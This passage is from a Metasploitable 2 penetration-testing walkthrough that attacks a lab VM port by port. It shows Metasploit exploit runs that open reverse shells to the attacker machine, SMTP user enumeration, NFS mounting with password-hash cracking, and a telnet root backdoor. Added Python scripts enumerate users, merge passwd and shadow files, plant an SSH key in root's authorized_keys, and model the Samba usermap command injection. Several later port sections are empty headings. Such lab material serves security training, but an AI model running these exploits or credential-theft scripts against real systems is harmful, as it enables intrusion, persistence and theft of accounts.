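    "rsa/2048/2712a6d5cec99f295a0c468b830a370d-28940.pub",
    "rsa/2048/" + md5_fingerprint(WEAK_KEY_LINE) + "-5429.pub",
]
WEAK_INDEX = index_weak_keys(ARCHIVE_LISTING)

if __name__ == "__main__":
    hit = find_matching_private_key(WEAK_KEY_LINE, WEAK_INDEX)
    print("ssh -lroot -p22 -i %s 10.10.10.101" % hit if hit else "no weak key matched")
```

With a real archive the listing would come from the extracted tarball and the key line from the target's authorized_keys file; a miss simply means that particular key was not generated by the broken PRNG.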

Port 23

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(scanner/telnet/telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS    10.10.10.101/32  yes       The target address range or CIDR identifier
   RPORT     23               yes       The target port (TCP)
   THREADS   1                yes       The number of concurrent threads
   TIMEOUT   30               yes       Timeout for the Telnet probe
   USERNAME                   no        The username to authenticate as

msf auxiliary(scanner/telnet/telnet_version) > run

[+] 10.10.10.101:23       - 10.10.10.101:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] 10.10.10.101:23       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/telnet/telnet_version) > creds add user:msfadmin password:msfadmin
msf auxiliary(scanner/telnet/telnet_version) > creds
Credentials
===========

host  origin  service  public    private   realm  private_type
----  ------  -------  ------    -------   -----  ------------
                       msfadmin  msfadmin         Password

msf auxiliary(scanner/telnet/telnet_version) >

Grabbing the banner for the Telnet service gives us our login hint: msfadmin / msfadmin. We add these credentials to the Metasploit creds database.

We can also create a usernames (/root/msfusers.txt) and passwords (/root/msfpasswords.txt) file containing these credentials for testing brute force attempts.

Port 25

We can use Metasploit to enumerate some of the users via SMTP, and add the identified accounts to our users file.

msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(scanner/smtp/smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   RHOSTS     10.10.10.101/32                                                yes       The target address range or CIDR identifier
   RPORT      25                                                             yes       The target port (TCP)
   THREADS    256                                                            yes       The number of concurrent threads
   UNIXONLY   true                                                           yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf auxiliary(scanner/smtp/smtp_enum) > run

[*] 10.10.10.101:25       - 10.10.10.101:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 10.10.10.101:25       - 10.10.10.101:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] 10.10.10.101:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smtp/smtp_enum) >

We have enumerated some of the common Unix users on the host, so we can create a list of usernames to be used for future scans and exploit attempts. We also have the initial password. We maintain the user list in a file called msfusers.txt for future use.
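As an added example (not the Metasploit module's code), here is the SMTP VRFY exchange that smtp_enum performs, written as a small Python client and run against an in-process fake Postfix so the conversation can be observed offline. The fake server's user list and its reply pattern (252 for a name it knows, 550 for one it does not) are constructed for this example.

```python
import socket
import threading

# Constructed stand-in for the target's Postfix: a few local accounts and the
# reply pattern the enumeration relies on (2xx for known names, 550 otherwise).
FAKE_LOCAL_USERS = {"backup", "postgres", "www-data", "msfadmin"}
FAKE_BANNER = b"220 metasploitable.localdomain ESMTP Postfix (Ubuntu)\r\n"


def _serve_client(conn):
    """One fake SMTP session: banner, HELO, VRFY per name, QUIT."""
    with conn:
        conn.sendall(FAKE_BANNER)
        reader = conn.makefile("rb")
        for raw in reader:
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "HELO":
                conn.sendall(b"250 metasploitable.localdomain\r\n")
            elif verb == "VRFY":
                if arg in FAKE_LOCAL_USERS:
                    conn.sendall(b"252 2.0.0 " + arg.encode() + b"\r\n")
                else:
                    conn.sendall(b"550 5.1.1 <" + arg.encode()
                                 + b">: Recipient address rejected: User unknown in local recipient table\r\n")
            elif verb == "QUIT":
                conn.sendall(b"221 2.0.0 Bye\r\n")
                return
            else:
                conn.sendall(b"502 5.5.2 Error: command not recognized\r\n")


def start_fake_smtp_server() -> int:
    """Listen on an ephemeral loopback port, serve each client in a daemon
    thread, and return the port number."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)

    def accept_loop():
        while True:
            conn, _ = listener.accept()
            threading.Thread(target=_serve_client, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener.getsockname()[1]


def smtp_vrfy_enum(host: str, port: int, candidates, timeout: float = 5.0):
    """The enumeration itself: one connection, HELO, then VRFY each candidate.
    A 250 or 252 reply means the server recognised the mailbox; 550 means it
    did not. Returns (banner, found_users, reply_code_per_candidate)."""
    found, replies = [], {}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        reader = sock.makefile("rb")
        banner = reader.readline().decode().strip()
        sock.sendall(b"HELO kali\r\n")
        reader.readline()                       # single-line 250 greeting
        for name in candidates:
            sock.sendall(b"VRFY " + name.encode() + b"\r\n")
            code = reader.readline()[:3].decode()
            replies[name] = code
            if code in ("250", "252"):
                found.append(name)
        sock.sendall(b"QUIT\r\n")
        reader.readline()
    return banner, found, replies


def demo():
    """Run the client against the in-process fake server with a constructed list."""
    port = start_fake_smtp_server()
    return smtp_vrfy_enum("127.0.0.1", port, ["root", "backup", "alice", "postgres", "www-data"])


if __name__ == "__main__":
    banner, found, replies = demo()
    print(banner)
    print("Users found:", ", ".join(found))
```

Against the real target you would point smtp_vrfy_enum at 10.10.10.101:25 with the unix_users.txt wordlist; the one-connection-many-VRFY pattern is also what a mail server's logs will show, which is worth knowing from the defensive side.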

Port 111 et al.

To get the showmount command on Kali, install nfs-common (apt-get install nfs-common) with elevated privileges. Since the root directory (/) is exported to all hosts (*), we can mount the file system remotely: mount -t nfs 10.10.10.101:/ /mnt. This gives us root-level access to the file system, so we can make whatever changes we require, including adding our own SSH public key to /root/.ssh/authorized_keys so that we can SSH onto the server. Since we can read any file, we can also look at sensitive files such as configuration files, /etc/passwd and /etc/shadow, and attempt to crack the password hashes.

root@kali:~# unshadow passwd shadow > unshadowed
root@kali:~# john -wordlist:/usr/share/metasploit-framework/data/wordlists/password.lst unshadowed 
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
123456789        (klog)
batman           (sys)
service          (service)
user             (user)
4g 0:00:00:24 DONE (2018-08-08 22:35) 0.1622g/s 3577p/s 17206c/s 17206C/s ?tude..vagrant
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~# john unshadowed 
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Remaining 3 password hashes with 3 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
postgres         (postgres)
msfadmin         (msfadmin)
root@kali:~#
root@kali:~# john -show unshadowed 
sys:batman:3:3:sys:/dev:/bin/sh
klog:123456789:103:104::/home/klog:/bin/false
msfadmin:msfadmin:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:postgres:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:user:1001:1001:just a user,111,,:/home/user:/bin/bash
service:service:1002:1002:,,,:/home/service:/bin/bash

6 password hashes cracked, 1 left
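As an added example that is not part of the walkthrough's own commands, the following Python does what the two NFS steps above rely on: it merges /etc/passwd and /etc/shadow the way unshadow does and names the hash scheme john reported (md5crypt, the $1$ prefix), and it appends an SSH public key to root's authorized_keys under the mount point with the permissions sshd insists on. The mount point, the passwd/shadow contents, the hashes and the public key are all constructed; it assumes the export does not squash root, which is what makes a write by root on Kali land as uid 0 on the target.

```python
import os
import tempfile
from pathlib import Path

# crypt(3) prefixes john recognises; "$1$" is the md5crypt seen above.
HASH_PREFIXES = (("$1$", "md5crypt"), ("$2", "bcrypt"), ("$5$", "sha256crypt"),
                 ("$6$", "sha512crypt"), ("$y$", "yescrypt"))


def classify_hash(field: str) -> str:
    """Name the hash scheme from its prefix, or flag accounts with no usable hash."""
    if field in ("", "*") or field.startswith("!"):
        return "locked/no password"
    for prefix, name in HASH_PREFIXES:
        if field.startswith(prefix):
            return name
    return "descrypt/unknown"


def unshadow(passwd_text: str, shadow_text: str) -> list:
    """What unshadow(8) does: copy each user's hash from shadow into the second
    field of the matching passwd line, so john also gets GECOS, home and shell."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def harvest_credentials(mount_root) -> tuple:
    """Read etc/passwd and etc/shadow below the mount point (assumed to be where
    10.10.10.101:/ was mounted) and return (merged lines, lines worth cracking)."""
    root = Path(mount_root)
    merged = unshadow((root / "etc/passwd").read_text(), (root / "etc/shadow").read_text())
    crackable = [l for l in merged if classify_hash(l.split(":")[1]) != "locked/no password"]
    return merged, crackable


def plant_authorized_key(mount_root, pubkey_line: str) -> Path:
    """Append our public key to root's authorized_keys on the export. Assumes the
    export does not squash root (otherwise the files land as nobody and sshd's
    StrictModes rejects them); modes are set to what sshd expects."""
    ssh_dir = Path(mount_root) / "root" / ".ssh"
    ssh_dir.mkdir(mode=0o700, parents=True, exist_ok=True)
    os.chmod(ssh_dir, 0o700)
    ak = ssh_dir / "authorized_keys"
    existing = ak.read_text() if ak.exists() else ""
    key = pubkey_line.strip()
    if key not in existing.splitlines():        # idempotent: never duplicate the key
        with ak.open("a") as fh:
            if existing and not existing.endswith("\n"):
                fh.write("\n")
            fh.write(key + "\n")
    os.chmod(ak, 0o600)
    return ak


# Constructed sample files (the hash strings are placeholders, not real digests).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
sys:x:3:3:sys:/dev:/bin/sh
klog:x:103:104::/home/klog:/bin/false
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
"""
SAMPLE_SHADOW = """root:$1$AAAAAAAA$BBBBBBBBBBBBBBBBBBBBBB:14747:0:99999:7:::
sys:$1$CCCCCCCC$DDDDDDDDDDDDDDDDDDDDDD:14742:0:99999:7:::
klog:$1$EEEEEEEE$FFFFFFFFFFFFFFFFFFFFFF:14742:0:99999:7:::
msfadmin:$1$GGGGGGGG$HHHHHHHHHHHHHHHHHHHHHH:14684:0:99999:7:::
sshd:*:14684:0:99999:7:::
"""
SAMPLE_PUBKEY = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDconstructed kali@attacker"


def demo():
    """Exercise both steps on a temporary directory laid out like the mount."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "etc").mkdir()
        (Path(tmp) / "etc/passwd").write_text(SAMPLE_PASSWD)
        (Path(tmp) / "etc/shadow").write_text(SAMPLE_SHADOW)
        merged, crackable = harvest_credentials(tmp)
        ak = plant_authorized_key(tmp, SAMPLE_PUBKEY)
        plant_authorized_key(tmp, SAMPLE_PUBKEY)   # second call must not duplicate
        return merged, crackable, ak.read_text(), oct(ak.stat().st_mode & 0o777)


if __name__ == "__main__":
    merged, crackable, ak_text, mode = demo()
    print("\n".join(crackable))
    print("authorized_keys (%s):\n%s" % (mode, ak_text), end="")
```

On the real mount you would call harvest_credentials("/mnt") and plant_authorized_key("/mnt", open("~/.ssh/id_rsa.pub").read()); the classify step is what tells you up front which accounts (sshd, locked service users) are not worth john's time.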

Port 139 and 445

msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(admin/smb/samba_symlink_traversal) > show options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      10.10.10.101     yes       The target address
   RPORT      445              yes       The SMB service port (TCP)
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

msf auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf auxiliary(admin/smb/samba_symlink_traversal) > run

[*] 10.10.10.101:445 - Connecting to the server...
[*] 10.10.10.101:445 - Trying to mount writeable share 'tmp'...
[*] 10.10.10.101:445 - Trying to link 'rootfs' to the root filesystem...
[*] 10.10.10.101:445 - Now access the following share to browse the root filesystem:
[*] 10.10.10.101:445 - 	\\10.10.10.101\tmp\rootfs\

[*] Auxiliary module execution completed
msf auxiliary(admin/smb/samba_symlink_traversal) >

We can now map the share and browse the root file system.

root@kali:~# smbclient -L 10.10.10.101
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            METASPLOITABLE
root@kali:~# smbclient //10.10.10.101/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 29 15:23:44 2018
  ..                                 DR        0  Mon May 21 04:36:12 2012
  4467.jsvc_up                        R        0  Fri Jul 27 21:38:21 2018
  .ICE-unix                          DH        0  Fri Jul 27 21:38:00 2018
  orbit-msfadmin                     DR        0  Sat Jul 28 20:25:32 2018
  .X11-unix                          DH        0  Fri Jul 27 21:38:07 2018
  .X0-lock                           HR       11  Fri Jul 27 21:38:07 2018
  rootfs                             DR        0  Mon May 21 04:36:12 2012
  gconfd-msfadmin                    DR        0  Sat Jul 28 20:25:32 2018

		7282168 blocks of size 1024. 5418792 blocks available
smb: \>

Since we now have access to the root file system through the rootfs link in the tmp share, we can attempt to obtain confidential data, such as the passwd and shadow files, to recover credentials. Note that this access is an anonymous (guest) login, so we only see what the guest account is permitted to read: /etc/passwd is world-readable, but /etc/shadow normally is not, which is why the NFS export is the more reliable route to the hashes. Another possible, and perhaps more direct, exploit may be using:

msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.10.10.101     yes       The target address
   RPORT  139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.10.100:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo VSMZEdzvYTQB0sEZ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "VSMZEdzvYTQB0sEZ\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (10.10.10.100:4444 -> 10.10.10.101:53066) at 2018-08-05 16:27:35 +1000

whoami
root
hostname
metasploitable
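
The reason usermap_script hands us root without any credentials is the bug class behind CVE-2007-2447: the affected Samba versions spliced the username from the SMB session setup into a shell command line for the "username map script" option without escaping it, so a username of the form /=`nohup ...` (the shape the Metasploit module sends) runs attacker commands as the smbd user, which is root. The following is an added example, not code from the original walkthrough or from Samba, that models the vulnerable pattern next to its hardened form locally; it assumes a Linux host with /bin/sh and uses /bin/echo as a stand-in for the configured map script.

```python
"""Added example (not from the original page or from Samba): the
command-injection pattern behind exploit/multi/samba/usermap_script
(CVE-2007-2447), modelled locally.

Assumptions: a Linux host with /bin/sh; /bin/echo stands in for the
administrator's "username map script".
"""
import subprocess

MAP_SCRIPT = "/bin/echo"  # stand-in for the configured username map script


def vulnerable_username_map(username: str) -> str:
    """Vulnerable pattern: the username is spliced into a string that
    /bin/sh parses, so backticks, $(...) and ';' are honoured and the
    attacker's command runs with the privileges of the daemon."""
    cmd = f"{MAP_SCRIPT} {username}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def hardened_username_map(username: str) -> str:
    """Hardened form: the username travels as a single argv element and no
    shell is involved, so metacharacters are inert and reach the script
    verbatim. This is the fix for the bug class, not Samba's exact patch."""
    out = subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True)
    return out.stdout.strip()


# Constructed attacker username in the same shape the Metasploit module uses:
# a leading "/=" keeps the map syntax plausible, the backticks carry the payload.
INJECTED_USERNAME = "/=`echo INJECTED`"


if __name__ == "__main__":
    # Vulnerable: the substitution runs and echo prints "/=INJECTED".
    print("vulnerable:", vulnerable_username_map(INJECTED_USERNAME))
    # Hardened: echo prints the username literally, backticks included.
    print("hardened:  ", hardened_username_map(INJECTED_USERNAME))
    # A more realistic payload against the vulnerable path: runs id(1).
    print("vulnerable:", vulnerable_username_map("/=`id`"))
```

Swap the echo payload for a reverse shell and the vulnerable function is exactly what the module triggers over SMB; the hardened function is the behaviour a patched smbd has.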

Port 512-514

for u in $(cat /root/msfusers.txt); do rsh -l $u 10.10.10.101; done

Every user prompts for a password. The reason is that without the rsh-client package the rsh command on Kali is the openssh-client alternative, i.e. it is really ssh, so the prompt we keep seeing is an SSH password prompt. Installing the real client fixes this (apt-get install rsh-client -y; see http://www.kalitutorials.net/2014/05/metasploitable-2-vulnerability.html). Note that rsh and rlogin must bind a privileged source port below 1024, so run them as root. With the real client the target's host-based trust lets us in without a password, and the loop yields a shell for each of the following users:

  • backup
  • bin
  • daemon
  • games
  • gnats
  • irc
  • libuuid
  • list
  • lp
  • mail
  • man
  • msfadmin
  • news
  • nobody
  • postgres
  • proxy
  • service
  • sys
  • user
  • uucp
  • www-data
  • root

Port 1099

msf auxiliary(scanner/misc/java_rmi_server) > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST      10.10.10.101     yes       The target address
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(multi/misc/java_rmi_server) > exploit

[*] Started reverse TCP handler on 10.10.10.100:4444 
[*] 10.10.10.101:1099 - Using URL: http://0.0.0.0:8080/CNnZ9xPLqN06
[*] 10.10.10.101:1099 - Local IP: http://10.0.2.15:8080/CNnZ9xPLqN06
[*] 10.10.10.101:1099 - Server started.
[*] 10.10.10.101:1099 - Sending RMI Header...
[*] 10.10.10.101:1099 - Sending RMI Call...
[*] 10.10.10.101:1099 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 10.10.10.101
[*] Meterpreter session 1 opened (10.10.10.100:4444 -> 10.10.10.101:34162) at 2018-08-06 20:59:02 +1000

[-] 10.10.10.101:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.10.10.101:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/java_rmi_server) > 
msf exploit(multi/misc/java_rmi_server) > sessions

Active sessions
===============

  Id  Name  Type                    Information            Connection
  --  ----  ----                    -----------            ----------
  1         meterpreter java/linux  root @ metasploitable  10.10.10.100:4444 -> 10.10.10.101:34162 (10.10.10.101)

msf exploit(multi/misc/java_rmi_server) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root
hostname
metasploitable
^Z
Background channel 1? [y/N]  y
meterpreter > 
Background session 1? [y/N]  
msf exploit(multi/misc/java_rmi_server) >
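
Two things in the output above are worth reading carefully. First, the module reports "Exploit completed, but no session was created" after session 1 had already opened: the payload JAR was served and the stage sent, but the module kept its HTTP server waiting for a further request until HTTPDELAY expired, so always check sessions before concluding the attempt failed. Second, the "Local IP: http://10.0.2.15:8080/..." line shows the NAT adapter's address being advertised from a multi-homed Kali VM; if the target never requests the JAR, set SRVHOST to the Kali address on vlabnet (10.10.10.100) so the URL is reachable from the target. The exploit itself works because the registry accepts an RMI call whose serialized argument carries a codebase URL and, with java.rmi.server.useCodebaseOnly=false (the default before JDK 7u21), the JVM downloads and loads the attacker's class from that URL.

Before any of that, the scanner had to recognise port 1099 as an RMI registry, which comes down to the JRMP transport handshake. The following is an added example, not code from the original page or from Metasploit, that performs that handshake: it builds the 7-byte client hello, parses the server's ProtocolAck, and includes a constructed stand-in registry so the probe can be exercised offline on the loopback interface; the sample reply bytes are constructed, not captured from the VM.

```python
"""Added example (not from the original walkthrough or from Metasploit): a
minimal Java RMI (JRMP) transport handshake, which is how a listener on
port 1099 is fingerprinted as an RMI registry.

Protocol (big-endian throughout):
  client -> server : "JRMI" | u16 version (2) | u8 protocol (0x4b = Stream)
  server -> client : u8 0x4e (ProtocolAck) | host as u16 length + bytes | i32 port
The JDK writes 0 for that trailing port, so the ack byte and host are the
meaningful parts of the reply.
"""
import socket
import struct
import threading

RMI_MAGIC = b"JRMI"
RMI_VERSION = 2
STREAM_PROTOCOL = 0x4B
PROTOCOL_ACK = 0x4E


def build_rmi_header() -> bytes:
    """The 7-byte client hello that starts every JRMP stream connection."""
    return RMI_MAGIC + struct.pack(">HB", RMI_VERSION, STREAM_PROTOCOL)


def parse_protocol_ack(data: bytes):
    """Return (host, port) for a well-formed ProtocolAck, else None.

    Anything else (an HTTP banner, a short read, a 0x4f ProtocolNack) is
    treated as 'not an RMI endpoint' rather than raising."""
    if len(data) < 7 or data[0] != PROTOCOL_ACK:
        return None
    (host_len,) = struct.unpack(">H", data[1:3])
    if len(data) < 3 + host_len + 4:
        return None
    host = data[3:3 + host_len].decode("utf-8", errors="replace")
    (port,) = struct.unpack(">i", data[3 + host_len:7 + host_len])
    return host, port


def probe_rmi(host: str, port: int = 1099, timeout: float = 5.0):
    """Connect, send the hello and parse the reply. Returns (host, port)
    when the peer speaks JRMP, None otherwise."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_rmi_header())
        reply = sock.recv(256)
    return parse_protocol_ack(reply)


def fake_registry_once(listen_host: str = "127.0.0.1"):
    """Constructed stand-in for an RMI registry so the probe can be run
    offline: answers exactly one connection with a ProtocolAck that names
    the client's address, as the JDK does. Returns (port, thread)."""
    srv = socket.socket()
    srv.bind((listen_host, 0))
    srv.listen(1)

    def serve():
        conn, peer = srv.accept()
        with conn, srv:
            if conn.recv(7) == build_rmi_header():
                host = peer[0].encode()
                ack = bytes([PROTOCOL_ACK]) + struct.pack(">H", len(host)) + host + struct.pack(">i", 0)
                conn.sendall(ack)

    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    return srv.getsockname()[1], thread


# Constructed reply: byte-for-byte what a registry returns to a client that
# connected from 10.10.10.100 (the Kali address in this lab).
SAMPLE_ACK = bytes([PROTOCOL_ACK]) + struct.pack(">H", 12) + b"10.10.10.100" + struct.pack(">i", 0)


if __name__ == "__main__":
    port, _ = fake_registry_once()
    print("fake registry:", probe_rmi("127.0.0.1", port))    # ('127.0.0.1', 0)
    print("sample ack:   ", parse_protocol_ack(SAMPLE_ACK))  # ('10.10.10.100', 0)
```

Against the lab, probe_rmi("10.10.10.101") returning a tuple is the same evidence auxiliary/scanner/misc/java_rmi_server reports; a None from the same port means the service is something else or is refusing the stream protocol.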

Port 1524

Nothing needs to be exploited here: the VM's inetd binds an interactive root shell directly to TCP 1524 (the ingreslock service entry), so a plain telnet connection lands in a root shell with no authentication at all. The doubled prompts below are an artefact of bash running without a pty.

root@kali:~# telnet 10.10.10.101 1524
Trying 10.10.10.101...
Connected to 10.10.10.101.
Escape character is '^]'.
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# root@metasploitable:/# hostname
metasploitable
root@metasploitable:/# root@metasploitable:/#

Port 2121

Port 3306

Port 3632

Port 5432

Port 5900

Port 6000

Port 6667

Port 6697

Port 8009

Port 8180

Port 8787

Port 34009

Port 35709

Port 47474

Port 51622

References

See also